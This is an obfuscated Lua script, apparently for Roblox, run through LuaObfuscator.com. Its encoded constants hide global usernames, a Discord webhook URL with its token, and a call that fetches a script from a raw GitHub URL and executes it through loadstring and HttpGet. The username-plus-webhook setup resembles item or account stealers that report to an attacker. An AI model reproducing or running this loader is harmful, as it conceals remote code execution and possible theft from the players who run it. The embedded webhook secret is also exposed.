--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.9.14) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=0;local v19;local v20;local v21;local v22;local v23;local v24;local v25;local v26;local v27;local v28;local v29;local v30;while true do if (v18==5) then v27=v24;v28=nil;function v28(...)return {...},v12("#",...);end v18=6;end if (v18==2) then function v22()local v31=v1(v16,v19,v19);v19=v19 + 1 ;return v31;end v23=nil;function v23()local v32=0 -0 ;local v33;local v34;while true do if (v32==(619 -(555 + 64))) then v33,v34=v1(v16,v19,v19 + (5 -3) );v19=v19 + (570 -(367 + (1078 -(282 + 595)))) ;v32=1 -0 ;end if (v32==(1 + 0)) then return (v34 * (41 + 215)) + v33 ;end end end v18=3;end if (v18==4) then function v25()local v35=1637 -(1248 + 275 + 114) ;local v36;local v37;local v38;local v39;local v40;local v41;while true do if (v35==((773 -(201 + 571)) + 0)) then v38=1 + 0 ;v39=(v21(v37,1 -(1138 -(116 + 1022)) ,1085 -(68 + 997) ) * (2^(1302 -(226 + (4346 -3302))))) + v36 ;v35=2 + 0 ;end if (v35==(8 -6)) then v40=v21(v37,(82 + 56) -(32 + 85) ,31 + 0 );v41=((v21(v37,69 -37 )==1) and  -(1 + 0)) or 1 ;v35=4 -(3 -2) ;end if ((0 + 0)==v35) then v36=v24();v37=v24();v35=958 -(892 + 65) ;end if (v35==(7 -4)) then if (v40==(0 -0)) then if (v39==((0 -0) -(859 -(814 + 45)))) then return v41 * (0 -0) ;else v40=351 -(87 + 263) ;v38=180 -(67 + 113) ;end elseif (v40==2047) then return ((v39==(0 + 0)) and (v41 * ((1 + 0)/(0 -0)))) or (v41 * NaN) ;end return v8(v41,v40-(753 + 270) ) * (v38 + (v39/((7 -5)^(1004 -(802 + 150))))) ;end end end v26=nil;function v26(v42)local v43;if  not v42 then v42=v24();if (v42==(0 + 0)) then return "";end end v43=v3(v16,v19,(v19 + v42) -1 );v19=v19 + v42 ;local v44={};for v67=2 -1 , #v43 do v44[v67]=v2(v1(v3(v43,v67,v67)));end return v6(v44);end v18=5;end if (v18==6) then v29=nil;function v29()local v45=0;local v46;local v47;local v48;local v49;local v50;local v51;local v52;while true do if (v45==(30 -(22 + 7))) then v48=nil;v49=nil;v45=1 + 1 ;end if ((1 + 1)==v45) then local v88=0;while true do if (v88~=(1985 -(1266 + 719))) then else v50=nil;v51=nil;v88=604 -(268 + 335) ;end if (v88==(291 -(60 + 230))) then v45=575 -(426 + 146) ;break;end end end if (v45==0) then v46=0;v47=nil;v45=1 + 0 ;end if ((1459 -(282 + 1174))~=v45) then else v52=nil;while true do if ((812 -(569 + 242))~=v46) then else v51=v24();v52={};for v101=2 -1 ,v51 do local v102=0;local v103;local v104;local v105;while true do if (v102~=1) then else v105=nil;while true do if (v103==(0 + 0)) then local v110=0;while true do if (v110~=(1025 -(706 + 318))) then else v103=1;break;end if (v110==(1251 -(721 + 530))) then v104=v22();v105=nil;v110=1;end end end if (v103~=1) then else if (v104==1) then v105=v22()~=(1271 -(945 + 326)) ;elseif (v104==(4 -2)) then v105=v25();elseif (v104==3) then v105=v26();end v52[v101]=v105;break;end end break;end if (v102==(0 + 0)) then v103=0;v104=nil;v102=701 -(271 + 429) ;end end end v50[3 + 0 ]=v22();v46=1502 -(1408 + 92) ;end if (v46==(1088 -(461 + 625))) then local v98=0;while true do local v106=0;while true do if (v106~=(1288 -(993 + 295))) then else if (0~=v98) then else local v107=0 + 0 ;while true do if (v107~=1) then else v98=1;break;end if (v107==(1171 -(418 + 753))) then for v152=1 + 0 ,v24() do local v153=0;local v154;local v155;local v156;while true do if (v153==0) then v154=0 + 0 ;v155=nil;v153=1 + 0 ;end if ((1 + 0)==v153) then v156=nil;while true do if (0==v154) then local v174=529 -(406 + 123) ;while true do if (v174~=(1770 -(1749 + 20))) then else v154=1;break;end if (v174~=0) then else v155=0;v156=nil;v174=1;end end end if (v154==(1 + 0)) then while true do if ((1322 -(1249 + 73))==v155) then v156=v22();if (v21(v156,1 + 0 ,1)~=0) then else local v177=1145 -(466 + 679) ;local v178;local v179;local v180;local v181;local v182;while true do if (0==v177) then v178=0;v179=nil;v177=2 -1 ;end if (v177==(5 -3)) then v182=nil;while true do if (v178~=(1902 -(106 + 1794))) then else while true do if (v179==2) then local v187=0 + 0 ;while true do if (v187==(1 + 0)) then v179=8 -5 ;break;end if (v187==(0 -0)) then local v196=114 -(4 + 110) ;while true do if (v196~=1) then else v187=1;break;end if (0==v196) then local v199=584 -(57 + 527) ;while true do if (0~=v199) then else if (v21(v181,1428 -(41 + 1386) ,1)~=1) then else v182[2]=v52[v182[105 -(17 + 86) ]];end if (v21(v181,2,2)~=1) then else v182[3 + 0 ]=v52[v182[3]];end v199=1 -0 ;end if (1~=v199) then else v196=2 -1 ;break;end end end end end end end if (v179==(167 -(122 + 44))) then local v188=0 -0 ;local v189;while true do if (v188==0) then v189=0 -0 ;while true do if (v189~=(0 + 0)) then else local v200=0;while true do if (v200~=(0 + 0)) then else v182={v23(),v23(),nil,nil};if (v180==0) then local v206=65 -(30 + 35) ;local v207;local v208;while true do if (v206~=(1 + 0)) then else while true do if (v207==(1257 -(1043 + 214))) then v208=0 -0 ;while true do if (v208==(1212 -(323 + 889))) then v182[7 -4 ]=v23();v182[584 -(361 + 219) ]=v23();break;end end break;end end break;end if (v206~=0) then else v207=0;v208=nil;v206=321 -(53 + 267) ;end end elseif (v180==1) then v182[3]=v24();elseif (v180==2) then v182[1 + 2 ]=v24() -((415 -(15 + 398))^(998 -(18 + 964))) ;elseif (v180==3) then local v211=0;local v212;local v213;while true do if (v211==1) then while true do if (0==v212) then v213=0 -0 ;while true do if (v213~=(0 + 0)) then else v182[2 + 1 ]=v24() -((852 -(20 + 830))^16) ;v182[4]=v23();break;end end break;end end break;end if (v211==(0 + 0)) then v212=0;v213=nil;v211=127 -(116 + 10) ;end end end v200=1 + 0 ;end if (v200==(739 -(542 + 196))) then v189=1 -0 ;break;end end end if (v189==1) then v179=1 + 1 ;break;end end break;end end end if (v179==(0 + 0)) then local v190=0 + 0 ;local v191;local v192;while true do if ((2 -1)==v190) then while true do if (v191~=0) then else v192=0;while true do if (v192==(0 -0)) then local v201=0;while true do if (v201~=(1552 -(1126 + 425))) then else v192=1;break;end if (v201==0) then v180=v21(v156,407 -(118 + 287) ,3);v181=v21(v156,15 -11 ,6);v201=1122 -(118 + 1003) ;end end end if ((2 -1)==v192) then v179=1;break;end end break;end end break;end if (v190==(377 -(142 + 235))) then v191=0 -0 ;v192=nil;v190=1 + 0 ;end end end if (v179==3) then if (v21(v181,3,3)~=1) then else v182[4]=v52[v182[4]];end v47[v152]=v182;break;end end break;end if (v178~=1) then else local v183=0;local v184;while true do if (v183==0) then v184=977 -(553 + 424) ;while true do if (0~=v184) then else local v197=0;while true do if (v197==0) then v181=nil;v182=nil;v197=1;end if (v197==1) then v184=1;break;end end end if (v184~=1) then else v178=2;break;end end break;end end end if (v178==0) then local v185=0 -0 ;local v186;while true do if (v185==0) then v186=0 + 0 ;while true do if (v186~=(0 + 0)) then else local v198=0;while true do if (v198==(0 + 0)) then v179=0 + 0 ;v180=nil;v198=1 + 0 ;end if (v198~=(2 -1)) then else v186=2 -1 ;break;end end end if (1==v186) then v178=1;break;end end break;end end end end break;end if (v177~=(2 -1)) then else v180=nil;v181=nil;v177=2;end end end break;end end break;end end break;end end end for v157=1 + 0 ,v24() do v48[v157-1 ]=v29();end v107=1;end end end if (v98~=1) then else return v50;end break;end end end end if (v46==0) then local v99=0;local v100;while true do if (v99==(0 -0)) then v100=0;while true do if (2~=v100) then else v46=754 -(239 + 514) ;break;end if (0==v100) then local v108=0 + 0 ;while true do if (v108==(1329 -(797 + 532))) then v47={};v48={};v108=1 + 0 ;end if (v108~=1) then else v100=1;break;end end end if (v100==1) then local v109=0 + 0 ;while true do if ((0 -0)==v109) then v49={};v50={v47,v48,nil,v49};v109=1;end if (v109==(1131 -(369 + 761))) then v100=2;break;end end end end break;end end end end break;end end end v30=nil;v18=7;end if (v18==0) then v19=1;v20=nil;v16=v4(v3(v16,5),"..",function(v53)if (v1(v53,2)==79) then v20=v0(v3(v53,1,1));return "";else local v83=v2(v0(v53,16));if v20 then local v89=0;local v90;while true do if (v89==1) then return v90;end if (v89==0) then v90=v5(v83,v20);v20=nil;v89=1;end end else return v83;end end end);v18=1;end if (v18==3) then v24=nil;function v24()local v54,v55,v56,v57=v1(v16,v19,v19 + 2 + 1 );v19=v19 + (6 -2) ;return (v57 * (31792904 -15015688)) + (v56 * (65774 -(64 + 174))) + (v55 * (37 + (323 -104))) + v54 ;end v25=nil;v18=4;end if (v18==7) then function v30(v58,v59,v60)local v61=v58[1];local v62=v58[2];local v63=v58[3];return function(...)local v69=v61;local v70=v62;local v71=v63;local v72=v28;local v73=1;local v74= -1;local v75={};local v76={...};local v77=v12("#",...) -1 ;local v78={};local v79={};for v84=0,v77 do if (v84>=v71) then v75[v84-v71 ]=v76[v84 + 1 ];else v79[v84]=v76[v84 + 1 ];end end local v80=(v77-v71) + 1 ;local v81;local v82;while true do local v85=0;while true do if (v85==1) then if (v82<=10) then if (v82<=4) then if (v82<=1) then if (v82>0) then local v112=v81[2];local v113=v79[v81[3]];v79[v112 + 1 ]=v113;v79[v112]=v113[v81[4]];else v79[v81[2]]=v81[3];end elseif (v82<=2) then v60[v81[3]]=v79[v81[2]];elseif (v82==3) then v79[v81[2]]=v60[v81[3]];else local v132=0;local v133;while true do if (v132==0) then v133=v81[2];v79[v133]=v79[v133](v13(v79,v133 + 1 ,v74));break;end end end elseif (v82<=7) then if (v82<=5) then v73=v81[3];elseif (v82==6) then if (v79[v81[2]]==v81[4]) then v73=v73 + 1 ;else v73=v81[3];end else v60[v81[3]]=v79[v81[2]];end elseif (v82<=8) then v79[v81[2]]=v60[v81[3]];elseif (v82>9) then v73=v81[3];else local v137=0;local v138;local v139;while true do if (v137==1) then v79[v138 + 1 ]=v139;v79[v138]=v139[v81[4]];break;end if (v137==0) then v138=v81[2];v139=v79[v81[3]];v137=1;end end end elseif (v82<=15) then if (v82<=12) then if (v82==11) then do return;end else v79[v81[2]]();end elseif (v82<=13) then if (v79[v81[2]]==v81[4]) then v73=v73 + 1 ;else v73=v81[3];end elseif (v82>14) then local v141=0;local v142;local v143;local v144;local v145;while true do if (v141==1) then v74=(v144 + v142) -1 ;v145=0;v141=2;end if (v141==0) then v142=v81[2];v143,v144=v72(v79[v142](v13(v79,v142 + 1 ,v81[3])));v141=1;end if (v141==2) then for v172=v142,v74 do local v173=0;while true do if (v173==0) then v145=v145 + 1 ;v79[v172]=v143[v145];break;end end end break;end end else v79[v81[2]]=v81[3]~=0 ;end elseif (v82<=18) then if (v82<=16) then local v124=v81[2];local v125,v126=v72(v79[v124](v13(v79,v124 + 1 ,v81[3])));v74=(v126 + v124) -1 ;local v127=0;for v128=v124,v74 do local v129=0;while true do if (v129==0) then v127=v127 + 1 ;v79[v128]=v125[v127];break;end end end elseif (v82>17) then v79[v81[2]]();else local v147=0;local v148;while true do if (v147==0) then v148=v81[2];v79[v148]=v79[v148](v13(v79,v148 + 1 ,v74));break;end end end elseif (v82<=19) then do return;end elseif (v82==20) then v79[v81[2]]=v81[3]~=0 ;else v79[v81[2]]=v81[3];end v73=v73 + 1 ;break;end if (v85==0) then v81=v69[v73];v82=v81[1];v85=1;end end end end;end return v30(v29(),{},v17)(...);end if (v18==1) then v21=nil;function v21(v64,v65,v66)if v66 then local v86=(v64/((338 -(144 + 192))^(v65-(217 -(42 + 174)))))%(((1977 -(1913 + 62)) + 0)^(((v66-(1 + 0)) -(v65-(1 + 0))) + (1505 -(229 + 134 + 1141)))) ;return v86-(v86%(1581 -(1183 + (1050 -653)))) ;else local v87=(5 -3)^(v65-1) ;return (((v64%(v87 + v87))>=v87) and (1 + 0)) or (0 + 0) ;end end v22=nil;v18=2;end end end v15("LOL!0C3O00028O00026O00F03F03093O00557365724E616D6532030B3O00484148414841616B6F6E69030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403463O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F4C7970686572582F4D6F7269536372697074732F6D61696E2F4D6F72695363726970745A03083O00557365724E616D65030A3O00597572696531365F313303073O00576562682O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F2O31333732303639332O31333235322O362O342F7344735F486F4D34576C626F4B784C47562O45496731374A7133697133396B576C35666A476B4A66684230394B344D594F52374350364734455F6A4B47544A67347A4B7200173O0012153O00013O00260D3O000E000100020004053O000E0001001215000100043O001202000100033O001208000100053O001208000200063O002001000200020007001215000400084O0014000500014O000F000200054O001100013O00022O000C0001000100010004053O0016000100260D3O0001000100010004053O000100010012150001000A3O001202000100093O0012150001000C3O0012020001000B3O0012153O00023O0004053O000100012O000B3O00017O00",v9(),...);
